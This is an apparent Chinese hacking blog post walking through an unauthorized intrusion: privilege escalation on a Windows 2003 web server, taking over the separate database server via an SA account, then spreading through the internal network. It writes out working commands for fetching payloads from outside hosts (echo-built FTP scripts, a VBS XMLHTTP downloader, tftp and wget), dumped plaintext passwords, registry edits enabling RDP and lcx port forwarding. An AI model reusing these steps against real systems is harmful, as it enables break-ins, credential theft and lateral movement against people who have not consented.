站库分离拿内网服务器到拿下目标服务器

0x00 提权环境
这是一机油来问我如何脱裤~~~
然后就试试提权
看了下端口,就开了80和3389
Windows 2003 x86

既然脱裤,就可想而知肯定有数据库

由图可知该例是站库分离,当时我还傻乎乎的拿着sa去执行添加用户命令
结果连不上~~~肯定连不上撒!!!
好吧,思路有以下几条:
一、              不管这配置文件,直接在原服务器上进行提权
二、              先利用sa拿下内网服务器然后再拿下原服务器
首先试试第一条~~
 
0x01 原服务器上提权
无常用的第三方软件,只有从溢出下手。
悲剧的是基本所有溢出都是这样,要么被杀(麦咖啡看门),要么就是执行不了。

好吧,丢了个lpk.dll上去~~~继续下面的思路吧。
 
0x02 先拿下内网服务器
 
拿内网服务器一共也有条思路~~~
第一、不用拿下服务器,直接读取hash,然后解密,看看是否内网机器都共用该密码~~~
第二、利用lcx转发工具拿下服务器,然后再在服务器中收集信息
但是以上两个思路都需要一个东西,就是要上传文件至数据库服务器上。
如何上传文件到服务器上?
思路有很多,我就介绍常用的三种
第一种、利用cmd命令调用ftp(或者tftp)上传文件(1433传马原理)
第二种、利用sql语句进行建立临时表写入数据然后导出数据
第三种、vbs脚本上传
首先第一种(可能机油就会问为什么不用echo命令写文件到服务器中~~~~echo只能一句句写而且遇到>或者>>符号时就会自动停止,所以不用echo写~~)
 
首先在本机上搭建ftp服务器
配置如下:
选择文件夹,文件夹中有需要上传的文件1.txt
加载中...
利用cmd写命令,一句一句的执行。
echo open 223.85.31.141>>test.txt登陆ftp服务器,223.85.31.141为本机ip
 
echo test>>test.txt写入用户名
 
echo test>>test.txt写入密码
 
echo bin>>test.txt相当于enter,就是开始的意思
 
echo get 1.txt>>test.txt下载ftp服务器中的1.txt
 
echo bye>>test.txt关闭ftp服务器
 
cmd执行完毕。
然后利用type命令查看test.txt中的文件信息
type test.txt
---------------------------------------------------------------------------------------------------------------
open 223.85.31.141
test
test
bin
get 1.txt

bye

如图:




加载中...
成功写入
下面就调用ftp命令进行下载执行这些命令~~~~
 
在本机测试结果如下:
----------------------------------------------------------------------------------------------------------------------------
ftp -s:test.txt
ftp> open 223.85.31.141
连接到 223.85.31.141。
220 Welcome to SUS FTP Server
用户(223.85.31.141:(none)):
331 Password required for test
 
230 Logged on
ftp> bin
200 Type set to I
ftp> get 1.txt
200 Port command successful
150 Opening data channel for file transfer.
226 Transfer complete
ftp: 收到 11 字节,用时 0.00秒 11.00千字节/秒。
ftp> bye
220 Bye
---------------------------------------------------------------------------------------------------------------------
 
 
悲剧的是在服务器上执行时,却是下面命令:
---------------------------------------------------------------------------------------------------------------------
'ftp' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
---------------------------------------------------------------------------------------------------------------------
由此可知原因大概就是ftp.exe被删除,或者有什么牛B的东西看门。
 
下面走第二个思路就是利用sql语句进行写入和导出~~~
本来还想好好写写存储过程的sql语句,本人就比较懒,就想在网上找找有木有直接利用脚本完成文件上传。
 
别说运气还真好,真找到一个Sa-Upfile 1.0(sa权限上传文件)
使用环境:SQL2000,SA权限,常用提权扩展存在。
原理:利用textcopy进行二进制导入导出。
好吧,试试看。

确实很好用,果断成功~~~~~
看来菜鸟真的是菜鸟,这就是传说中的saupfile组建~~~~
但是原理还是看看这篇文章:
如何通过SQL SERVER远程上传文件的实现
 
这里还是补充下用vbs下载文件和tftp下载~~就如上面一样,一旦管理员删除ftp.exe
就无法达到上传的目的
VBS下载文件
但是脚本的强大就在这里体现~~~~
脚本上传只需要ADODB.Stream的支持,windows系统默认是支持的。
上传脚本如下(同样是cmd执行如下命令):
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://f4ck.yueyan.net/yueyan.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"C:\yueyan.exe^",2 >down.vbs
 
然后执行cscript down.vbs就可以完成下载。
 
Tftp下载:
Tftp下载应该是这当中最简单的上传方式,为什么我会最后提,并且我并不推荐tftp上传。
只是为大家介绍一下就行了。
原因就是tftp是基于udp协议,了解udp和tc/ip协议的人都应该知道udp协议设计就是为了传输少量数据。QQ聊天消息就是基于这个协议。所以只能传输小文件,当然传输一个wget还是毫无压力的~~~~但是有时候会存在一些杀毒软件会阻止该传输过程~~所以不建议。
 
说说利用方法:首先现在本机大家tftp服务器
加载中...
 
然后在服务器上执行命令,一条就够了
tftp-I <your ip> get yueyan.exe path/yueyan.exe
例如我要下载yueyan.exe到c盘根目录,就执行
tftp–I 110.110.110.110 get yueyan.exe c:/yueyan.exe
就这么简单,如果不加路径默认是system32这个目录。
 
 
如果下载文件比较多,建议上传一个wget.exe
命令如下:

Wgethttp://f4ck.yueyan.com/yueyan.exe

这样上传其他文件就方便了
 
首先先用GetPass.exe直接抓取明文密码
------------------------------------------------------------------------------------------------------------------------------
UserName: Administrator
LogonDomain: WIN-QUB8GLT3HKB
password:000
--------------------------------------------------------------------------------------------------------------------------------
要不要这样~~~~000,这么在原服务器上试了试。
加载中...
 
登陆不上,好吧我承认我今天踩死了一只打屁虫~~~
这个很好解决.先看服务器是否开启3389
用netstat–an查看木有开启3389,又用cmd查看远程终端:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
由于系统权限,可以直接命令开启
开启3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
 
开完之后直接转发就ok了~~
 
本机执行lcx -listen 51 33891
服务器执行lcx–slave 223.85.31.141  51  127.0.0.1  3389
连接127.0.0.1:33891

 
好吧~~~终于进去了~~~
 
0x03 从内网慢慢来拿原服务器
拿下一台服务器现在祭出我的神器~~~h-scan
 

 
再祭出神器二~~~sqltool
一个个的提权~~~~
疯狂的拿服务器~~~~拿服务器是为什么呢?收集信息嘛~~
拿一个服务器,抓一个服务器的密码~~~~
得到好几个密码~~~~
然后再到本机上登陆
成功登陆
 


从实际来讲拿这个服务器并无实际的原因,就是想提权~~~

posted @ 2015-05-02 21:56  anything good  阅读(2835)  评论(0编辑  收藏  举报
孤 's 博客